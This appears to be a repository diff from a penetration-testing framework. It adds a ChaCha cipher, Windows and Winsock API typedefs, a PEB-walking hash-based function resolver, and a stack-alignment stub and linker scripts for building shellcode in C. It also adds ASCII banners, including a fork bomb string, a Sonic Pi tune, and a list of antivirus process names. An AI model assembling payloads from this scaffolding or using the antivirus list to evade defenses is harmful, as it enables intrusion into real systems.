+* Note: If pos is outside the vector capacity, we resize it accordingly
+*/
+#define Vector_Put(v, pos, elem) __vector_PutPtr(v, pos, elem ? &(typeof(elem)){elem} : NULL)
+
+/* Push an element at the end of v, resizing it if needed. This macro wraps
+ * __vector_PushPtr */
+#define Vector_Push(v, elem) __vector_PushPtr(v, elem ? &(typeof(elem)){elem} : NULL)
+
+int __vector_PushPtr(Vector *v, void *elem);
+
+/* resize capacity of v */
+int Vector_Resize(Vector *v, size_t newcap);
+
+/* return the used size of the vector, regardless of capacity */
+int Vector_Size(Vector *v);
+
+/* return the actual capacity */
+int Vector_Cap(Vector *v);
+
+/* free the vector and the underlying data. Does not release its elements if
+ * they are pointers*/
+void Vector_Free(Vector *v);
+
+int __vecotr_PutPtr(Vector *v, size_t pos, void *elem);
+
+#endif
@@ -0,0 +1,224 @@
+/*
+chacha-merged.c version 20080118
+D. J. Bernstein
+Public domain.
+*/
+
+/* $OpenBSD: chacha_private.h,v 1.2 2013/10/04 07:02:27 djm Exp $ */
+
+#include <stddef.h>
+
+typedef unsigned char u8;
+typedef unsigned int u32;
+
+typedef struct
+{
+  u32 input[16]; /* could be compressed */
+} chacha_ctx;
+
+#define U8C(v) (v##U)
+#define U32C(v) (v##U)
+
+#define U8V(v) ((u8)(v) & U8C(0xFF))
+#define U32V(v) ((u32)(v) & U32C(0xFFFFFFFF))
+
+#define ROTL32(v, n) \
+  (U32V((v) << (n)) | ((v) >> (32 - (n))))
+
+#define U8TO32_LITTLE(p) \
+  (((u32)((p)[0])      ) | \
+   ((u32)((p)[1]) <<  8) | \
+   ((u32)((p)[2]) << 16) | \
+   ((u32)((p)[3]) << 24))
+
+#define U32TO8_LITTLE(p, v) \
+  do { \
+    (p)[0] = U8V((v)      ); \
+    (p)[1] = U8V((v) >>  8); \
+    (p)[2] = U8V((v) >> 16); \
+    (p)[3] = U8V((v) >> 24); \
+  } while (0)
+
+#define ROTATE(v,c) (ROTL32(v,c))
+#define XOR(v,w) ((v) ^ (w))
+#define PLUS(v,w) (U32V((v) + (w)))
+#define PLUSONE(v) (PLUS((v),1))
+
+#define QUARTERROUND(a,b,c,d) \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a),16); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c),12); \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a), 8); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c), 7);
+
+static const char sigma[16] = "expand 32-byte k";
+static const char tau[16] = "expand 16-byte k";
+
+static void
+chacha_keysetup(chacha_ctx *x,const u8 *k,u32 kbits,u32 ivbits)
+{
+  const char *constants;
+
+  x->input[4] = U8TO32_LITTLE(k + 0);
+  x->input[5] = U8TO32_LITTLE(k + 4);
+  x->input[6] = U8TO32_LITTLE(k + 8);
+  x->input[7] = U8TO32_LITTLE(k + 12);
+  if (kbits == 256) { /* recommended */
+    k += 16;
+    constants = sigma;
+  } else { /* kbits == 128 */
+    constants = tau;
+  }
+  x->input[8] = U8TO32_LITTLE(k + 0);
+  x->input[9] = U8TO32_LITTLE(k + 4);
+  x->input[10] = U8TO32_LITTLE(k + 8);
+  x->input[11] = U8TO32_LITTLE(k + 12);
+  x->input[0] = U8TO32_LITTLE(constants + 0);
+  x->input[1] = U8TO32_LITTLE(constants + 4);
+  x->input[2] = U8TO32_LITTLE(constants + 8);
+  x->input[3] = U8TO32_LITTLE(constants + 12);
+}
+
+static void
+chacha_ivsetup(chacha_ctx *x,const u8 *iv)
+{
+  x->input[12] = 1;
+  x->input[13] = U8TO32_LITTLE(iv + 0);
+  x->input[14] = U8TO32_LITTLE(iv + 4);
+  x->input[15] = U8TO32_LITTLE(iv + 8);
+}
+
+static void
+chacha_encrypt_bytes(chacha_ctx *x,const u8 *m,u8 *c,u32 bytes)
+{
+  u32 x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15;
+  u32 j0, j1, j2, j3, j4, j5, j6, j7, j8, j9, j10, j11, j12, j13, j14, j15;
+  u8 *ctarget = NULL;
+  u8 tmp[64];
+  u32 i;
+
+  if (!bytes) return;
+
+  j0 = x->input[0];
+  j1 = x->input[1];
+  j2 = x->input[2];
+  j3 = x->input[3];
+  j4 = x->input[4];
+  j5 = x->input[5];
+  j6 = x->input[6];
+  j7 = x->input[7];
+  j8 = x->input[8];
+  j9 = x->input[9];
+  j10 = x->input[10];
+  j11 = x->input[11];
+  j12 = x->input[12];
+  j13 = x->input[13];
+  j14 = x->input[14];
+  j15 = x->input[15];
+
+  for (;;) {
+    if (bytes < 64) {
+      for (i = 0;i < bytes;++i) tmp[i] = m[i];
+      m = tmp;
+      ctarget = c;
+      c = tmp;
+    }
+    x0 = j0;
+    x1 = j1;
+    x2 = j2;
+    x3 = j3;
+    x4 = j4;
+    x5 = j5;
+    x6 = j6;
+    x7 = j7;
+    x8 = j8;
+    x9 = j9;
+    x10 = j10;
+    x11 = j11;
+    x12 = j12;
+    x13 = j13;
+    x14 = j14;
+    x15 = j15;
+    for (i = 20;i > 0;i -= 2) {
+      QUARTERROUND( x0, x4, x8,x12)
+      QUARTERROUND( x1, x5, x9,x13)
+      QUARTERROUND( x2, x6,x10,x14)
+      QUARTERROUND( x3, x7,x11,x15)
+      QUARTERROUND( x0, x5,x10,x15)
+      QUARTERROUND( x1, x6,x11,x12)
+      QUARTERROUND( x2, x7, x8,x13)
+      QUARTERROUND( x3, x4, x9,x14)
+    }
+    x0 = PLUS(x0,j0);
+    x1 = PLUS(x1,j1);
+    x2 = PLUS(x2,j2);
+    x3 = PLUS(x3,j3);
+    x4 = PLUS(x4,j4);
+    x5 = PLUS(x5,j5);
+    x6 = PLUS(x6,j6);
+    x7 = PLUS(x7,j7);
+    x8 = PLUS(x8,j8);
+    x9 = PLUS(x9,j9);
+    x10 = PLUS(x10,j10);
+    x11 = PLUS(x11,j11);
+    x12 = PLUS(x12,j12);
+    x13 = PLUS(x13,j13);
+    x14 = PLUS(x14,j14);
+    x15 = PLUS(x15,j15);
+
+#ifndef KEYSTREAM_ONLY
+    x0 = XOR(x0,U8TO32_LITTLE(m + 0));
+    x1 = XOR(x1,U8TO32_LITTLE(m + 4));
+    x2 = XOR(x2,U8TO32_LITTLE(m + 8));
+    x3 = XOR(x3,U8TO32_LITTLE(m + 12));
+    x4 = XOR(x4,U8TO32_LITTLE(m + 16));
+    x5 = XOR(x5,U8TO32_LITTLE(m + 20));
+    x6 = XOR(x6,U8TO32_LITTLE(m + 24));
+    x7 = XOR(x7,U8TO32_LITTLE(m + 28));
+    x8 = XOR(x8,U8TO32_LITTLE(m + 32));
+    x9 = XOR(x9,U8TO32_LITTLE(m + 36));
+    x10 = XOR(x10,U8TO32_LITTLE(m + 40));
+    x11 = XOR(x11,U8TO32_LITTLE(m + 44));
+    x12 = XOR(x12,U8TO32_LITTLE(m + 48));
+    x13 = XOR(x13,U8TO32_LITTLE(m + 52));
+    x14 = XOR(x14,U8TO32_LITTLE(m + 56));
+    x15 = XOR(x15,U8TO32_LITTLE(m + 60));
+#endif
+
+    j12 = PLUSONE(j12);
+    if (!j12) {
+      j13 = PLUSONE(j13);
+      /* stopping at 2^70 bytes per nonce is user's responsibility */
+    }
+
+    U32TO8_LITTLE(c + 0,x0);
+    U32TO8_LITTLE(c + 4,x1);
+    U32TO8_LITTLE(c + 8,x2);
+    U32TO8_LITTLE(c + 12,x3);
+    U32TO8_LITTLE(c + 16,x4);
+    U32TO8_LITTLE(c + 20,x5);
+    U32TO8_LITTLE(c + 24,x6);
+    U32TO8_LITTLE(c + 28,x7);
+    U32TO8_LITTLE(c + 32,x8);
+    U32TO8_LITTLE(c + 36,x9);
+    U32TO8_LITTLE(c + 40,x10);
+    U32TO8_LITTLE(c + 44,x11);
+    U32TO8_LITTLE(c + 48,x12);
+    U32TO8_LITTLE(c + 52,x13);
+    U32TO8_LITTLE(c + 56,x14);
+    U32TO8_LITTLE(c + 60,x15);
+
+    if (bytes <= 64) {
+      if (bytes < 64) {
+        for (i = 0;i < bytes;++i) ctarget[i] = c[i];
+      }
+      x->input[12] = j12;
+      x->input[13] = j13;
+      return;
+    }
+    bytes -= 64;
+    c += 64;
+#ifndef KEYSTREAM_ONLY
+    m += 64;
+#endif
+  }
+}
@@ -0,0 +1,136 @@
+#ifndef _KERNEL_UTIL
+#define _KERNEL_UTIL
+
+typedef BOOL (WINAPI *FuncCreateProcess) (
+	LPCTSTR lpApplicationName,
+	LPTSTR lpCommandLine,
+	LPSECURITY_ATTRIBUTES lpProcessAttributes,
+	LPSECURITY_ATTRIBUTES lpThreadAttributes,
+	BOOL bInheritHandles,
+	DWORD dwCreationFlags,
+	LPVOID lpEnvironment,
+	LPCTSTR lpCurrentDirectory,
+	LPSTARTUPINFO lpStartupInfo,
+	LPPROCESS_INFORMATION lpProcessInformation
+);
+
+typedef BOOL (WINAPI *FuncSetHandleInformation)
+(
+  HANDLE hObject,
+  DWORD dwMask,
+  DWORD dwFlags
+);
+
+typedef BOOL (WINAPI *FuncReadFile)
+(
+  HANDLE hFile,
+  LPVOID lpBuffer,
+  DWORD nNumberOfBytesToRead,
+  LPDWORD lpNumberOfBytesToRead,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncWriteFile)
+(
+  HANDLE hFile,
+  LPCVOID lpBuffer,
+  DWORD nNumberOfBytesToWrite,
+  LPDWORD lpNumberOfBytesWritten,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncPeekNamedPipe)
+(
+  HANDLE hNamedPipe,
+  LPVOID lpBuffer,
+  DWORD nBufferSize,
+  LPDWORD nBytesRead,
+  LPDWORD lpTotalBytesAvailable,
+  LPDWORD lpBytesLeftThisMessage
+);
+
+typedef BOOL (WINAPI *FuncCreatePipe)
+(
+  PHANDLE hReadPipe,
+  PHANDLE hWritePipe,
+  LPSECURITY_ATTRIBUTES lpPipeAttributes,
+  DWORD nSize
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalAlloc)
+(
+  UINT uFlags,
+  SIZE_T dwBytes
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalFree)
+(
+  HGLOBAL hMem
+);
+
+typedef HANDLE (WINAPI *FuncHeapCreate)
+(
+  DWORD flOptions,
+  SIZE_T dwInitialize,
+  SIZE_T dwMaximumSize
+);
+
+typedef LPVOID (WINAPI *FuncHeapAlloc)
+(
+  HANDLE hHeap,
+  DWORD dwFlags,
+  SIZE_T dwBytes
+);
+
+typedef VOID (WINAPI *FuncSleep)
+(
+  DWORD dwMilliseconds
+);
+
+typedef HANDLE (WINAPI *FuncGetCurrentProcess) ();
+
+typedef BOOL (WINAPI *FuncGetExitCodeProcess)
+(
+  HANDLE hProcess,
+  LPDWORD lpExitCode
+);
+
+typedef VOID (WINAPI *FuncExitProcess)
+(
+  UINT uExitCode
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef BOOL (WINAPI *FuncVirtualProtect)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flNewProtect,
+  PDWORD lpflOldProtect
+);
+
+typedef LPVOID (WINAPI *FuncVirtualAlloc)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flAllocationType,
+  DWORD flProtect
+);
+
+typedef BOOL (WINAPI *FuncVirtualFree)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD dwFreeType
+);
+
+#endif
@@ -0,0 +1,152 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+#ifndef _PAYLOAD_UTIL
+#define _PAYLOAD_UTIL
+
+#include <windows.h>
+#include <winternl.h>
+
+typedef HMODULE (WINAPI *FuncLoadLibraryA) (
+	LPTSTR lpFileName
+);
+
+// This compiles to a ROR instruction
+// This is needed because _lrotr() is an external reference
+// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
+#define ROTR32(value, shift)	(((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
+
+// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
+typedef struct _MY_PEB_LDR_DATA {
+  ULONG Length;
+	BOOL Initialized;
+	PVOID SsHandle;
+	LIST_ENTRY InLoadOrderModuleList;
+  LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;
+
+typedef struct _MY_LDR_DATA_TABLE_ENTRY
+{
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	LIST_ENTRY InInitializationOrderLinks;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;
+
+HMODULE GetProcAddressWithHash( _In_ DWORD dwModuleFunctionHash )
+{
+	PPEB PebAddress;
+	PMY_PEB_LDR_DATA pLdr;
+	PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
+	PVOID pModuleBase;
+	PIMAGE_NT_HEADERS pNTHeader;
+	DWORD dwExportDirRVA;
+	PIMAGE_EXPORT_DIRECTORY pExportDir;
+	PLIST_ENTRY pNextModule;
+	DWORD dwNumFunctions;
+	USHORT usOrdinalTableIndex;
+	PDWORD pdwFunctionNameBase;
+	PCSTR pFunctionName;
+	UNICODE_STRING BaseDllName;
+	DWORD dwModuleHash;
+	DWORD dwFunctionHash;
+	PCSTR pTempChar;
+	DWORD i;
+
+#if defined(_WIN64)
+	PebAddress = (PPEB) __readgsqword( 0x60 );
+#else
+	PebAddress = (PPEB) __readfsdword( 0x30 );
+#endif
+
+	pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
+	pNextModule = pLdr->InLoadOrderModuleList.Flink;
+	pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;
+
+	while (pDataTableEntry->DllBase != NULL)
+	{
+		dwModuleHash = 0;
+		pModuleBase = pDataTableEntry->DllBase;
+		BaseDllName = pDataTableEntry->BaseDllName;
+		pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
+		dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;
+
+		// Get the next loaded module entry
+		pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;
+
+		// If the current module does not export any functions, move on to the next module.
+		if (dwExportDirRVA == 0)
+		{
+			continue;
+		}
+
+		// Calculate the module hash
+		for (i = 0; i < BaseDllName.MaximumLength; i++)
+		{
+			pTempChar = ((PCSTR) BaseDllName.Buffer + i);
+
+			dwModuleHash = ROTR32( dwModuleHash, 13 );
+
+			if ( *pTempChar >= 0x61 )
+			{
+				dwModuleHash += *pTempChar - 0x20;
+			}
+			else
+			{
+				dwModuleHash += *pTempChar;
+			}
+		}
+
+		pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);
+
+		dwNumFunctions = pExportDir->NumberOfNames;
+		pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames);
+
+		for (i = 0; i < dwNumFunctions; i++)
+		{
+			dwFunctionHash = 0;
+			pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
+			pdwFunctionNameBase++;
+
+			pTempChar = pFunctionName;
+
+			do
+			{
+				dwFunctionHash = ROTR32( dwFunctionHash, 13 );
+				dwFunctionHash += *pTempChar;
+				pTempChar++;
+			} while (*(pTempChar - 1) != 0);
+
+			dwFunctionHash += dwModuleHash;
+
+			if (dwFunctionHash == dwModuleFunctionHash)
+			{
+				usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
+				return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
+			}
+		}
+	}
+
+	// All modules have been exhausted and the function was not found.
+	return NULL;
+}
+
+#endif
@@ -0,0 +1,64 @@
+#ifndef _WINSOCK_UTIL
+#define _WINSOCK_UTIL
+
+#define WIN32_LEAN_AND_MEAN
+
+#include <windows.h>
+#include <winsock2.h>
+#include <intrin.h>
+#include <ws2tcpip.h>
+
+typedef int (WINAPI *FuncWSAStartup)
+(
+  WORD wVersionRequired,
+  LPWSADATA lpWSAData
+);
+
+typedef int (WINAPI *FuncWSACleanup) ();
+
+typedef int (WINAPI *FuncGetAddrInfo)
+(
+  PCSTR pNodeName,
+  PCSTR pServiceName,
+  const ADDRINFO *pHints,
+  LPADDRINFO *ppResult
+);
+
+typedef void (WINAPI *FuncFreeAddrInfo)
+(
+  LPADDRINFO pAddrInfo
+);
+
+typedef SOCKET (WINAPI *FuncWSASocketA) (
+	int af,
+	int type,
+	int protocol,
+	LPWSAPROTOCOL_INFO lpProtocolInfo,
+	GROUP g,
+	DWORD dwFlags
+);
+
+typedef int (WINAPI *FuncConnect)
+(
+  SOCKET s,
+  const struct sockaddr *name,
+  int namelen
+);
+
+typedef int (WINAPI *FuncSend)
+(
+  SOCKET s,
+  const char *buf,
+  int len,
+  int flags
+);
+
+typedef int (WINAPI *FuncRecv)
+(
+  SOCKET s,
+  char *buf,
+  int len,
+  int flags
+);
+
+#endif
@@ -0,0 +1,33 @@
+                                              `:oDFo:`                            
+                                           ./ymM0dayMmy/.                          
+                                        -+dHJ5aGFyZGVyIQ==+-                    
+                                    `:sm⏣~~Destroy.No.Data~~s:`                
+                                 -+h2~~Maintain.No.Persistence~~h+-              
+                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`          
+                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.      
+                       -++SecKCoin++e.AMd`       `.-://///+hbove.913.ElsMNh+-    
+                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-  
+                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:  
+                      :we're.all.alike'`                     The.PFYroy.No.D7:  
+                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:    
+                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:    
+                      :---srwxrwx:-.`                        `MS146.52.No.Per:    
+                      :<script>.Ac816/                        sENbove3101.404:    
+                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
+                      :09.14.2011.raid                       /STFU|wall.No.Pr:    
+                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:    
+                      :#OUTHOUSE-  -s:                       /corykennedyData:    
+                      :$nmap -oS                              SSo.6178306Ence:    
+                      :Awsm.da:                            /shMTl#beats3o.No.:    
+                      :Ring0:                             `dDestRoyREXKC3ta/M:    
+                      :23d:                               sSETEC.ASTRONOMYist:    
+                       /-                        /yo-    .ence.N:(){ :|: & };:    
+                                                 `:Shall.We.Play.A.Game?tron/    
+                                                 ```-ooy.if1ghtf0r+ehUser5`    
+                                               ..th3.H1V3.U2VjRFNN.jMh+.`          
+                                              `MjM~~WE.ARE.se~~MMjMs              
+                                               +~KANSAS.CITY's~-`                  
+                                                J~HAKCERS~./.`                    
+                                                .esc:wq!:`                        
+                                                 +++ATH`                            
+                                                  `
@@ -0,0 +1,22 @@
+%clr                                   ___          ____
+                               ,-""   `.%yel      %whi< HONK >
+                             ,'  _   e %yel)`-._%whi /  ----
+                            /  ,' `-._%yel<.===-'%whi
+                           /  /
+                          /  ;
+              _          /   ;
+ (`._    _.-"" ""--..__,'    |
+ <_  `-""                     \
+  <`-                          :
+   (__   <__.                  ;
+     `-.   '-.__.      _.'    /
+        \      `-.__,-'    _,'
+         `._    ,    /__,-'
+            ""._\__,'%yel< <____%whi
+                 %yel| |  `----.`.
+%whi                 %yel| |        \ `.
+%whi                 %yel; |___      \-``
+%whi                 %yel\   --<
+%whi                  %yel`.`.<
+%whi                    %yel`-'
+%whi
@@ -0,0 +1,58 @@
+use_bpm 130
+use_synth_defaults sustain: 0
+
+live_loop :drums do
+  sample :drum_heavy_kick, amp: 2
+  sleep 1
+  sample :drum_snare_hard
+  sleep 1
+end
+
+live_loop :hi_hat do
+  sample :drum_cymbal_closed, amp: 0.5
+  sleep 0.5
+end
+
+live_loop :bass do
+  use_synth :pluck
+
+  notes = %i[
+    Eb3  Eb3  Eb3
+    B2   B2   B2
+    Fs2  Fs2  Fs2
+    As2  As2  As2  As2
+  ]
+
+  beats = %w[
+    2.0  1.0  1.0
+    2.0  1.0  1.0
+    2.0  1.0  1.0
+    1.5  1.0  0.5  1.0
+  ].map(&:to_f)
+
+  with_fx :reverb do
+    play_pattern_timed notes, beats
+  end
+end
+
+live_loop :lead do
+  use_synth :piano
+
+  notes = %i[
+    As4   As4   As4   As4   Gs4   As4   As4
+    As4   As4   As4   Gs4   As4   As4
+    Db5   As4   Gs4   Fs4
+    Eb4   Eb4   F4    Fs4   Eb4
+  ]
+
+  beats = %w[
+    2.00  0.50  0.25  0.25  0.25  0.75  2.00
+    0.50  0.25  0.25  0.25  0.75  1.50
+    1.00  1.00  1.00  1.00
+    0.50  0.50  0.50  0.50  0.50
+  ].map(&:to_f)
+
+  with_fx :reverb do
+    play_pattern_timed notes, beats
+  end
+end
@@ -0,0 +1,48 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+; Author:       Matthew Graeber (@mattifestation)
+; License:      BSD 3-Clause
+; Syntax:       MASM
+; Build Syntax: ml64 /c /Cx AdjustStack.asm
+; Output:       AdjustStack.obj
+; Notes: I really wanted to avoid having this external dependency but I couldnt
+; come up with any other way to guarantee 16-byte stack alignment in 64-bit
+; shellcode written in C.
+
+extern	ExecutePayload
+global  AlignRSP			; Marking AlignRSP as PUBLIC allows for the function
+							; to be called as an extern in our C code.
+
+segment .text
+
+; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
+; to calling the entry point of the payload. This is necessary because 64-bit functions
+; in Windows assume that they were called with 16-byte stack alignment. When amd64
+; shellcode is executed, you cant be assured that you stack is 16-byte aligned. For example,
+; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
+; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
+; alignment.
+
+AlignRSP:
+	push	rsi						; Preserve RSI since were stomping on it
+	mov		rsi, rsp				; Save the value of RSP so it can be restored
+	and		rsp, 0FFFFFFFFFFFFFFF0h	; Align RSP to 16 bytes
+	sub		rsp, 020h				; Allocate homing space for ExecutePayload
+	call	ExecutePayload			; Call the entry point of the payload
+	mov		rsp, rsi				; Restore the original value of RSP
+	pop		rsi						; Restore RSI
+	ret								; Return to caller
@@ -0,0 +1,9 @@
+ENTRY(_ExecutePayload)
+SECTIONS
+{
+	.text :
+	{
+		*(.text.ExecutePayload)
+	}
+
+}
@@ -0,0 +1,11 @@
+ENTRY(AlignRSP)
+SECTIONS
+{
+	.text :
+	{
+    *(.text.AlignRSP)
+		*(.text.ExecutePayload)
+		*(.text.GetProcAddressWithHash)
+	}
+
+}
@@ -1,3 +1,12 @@
+AlMon.exe 
+SAVAdminService.exe 
+SavService.exe 
+SNTPService.exe 
+swc_service.exe 
+swi_fc.exe
+swi_filter.exe
+swi_service.exe 
+swi_fc.exe  
 emet_agent.exe
 emet_service.exe
 firesvc.exe
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .5.3
 .6.5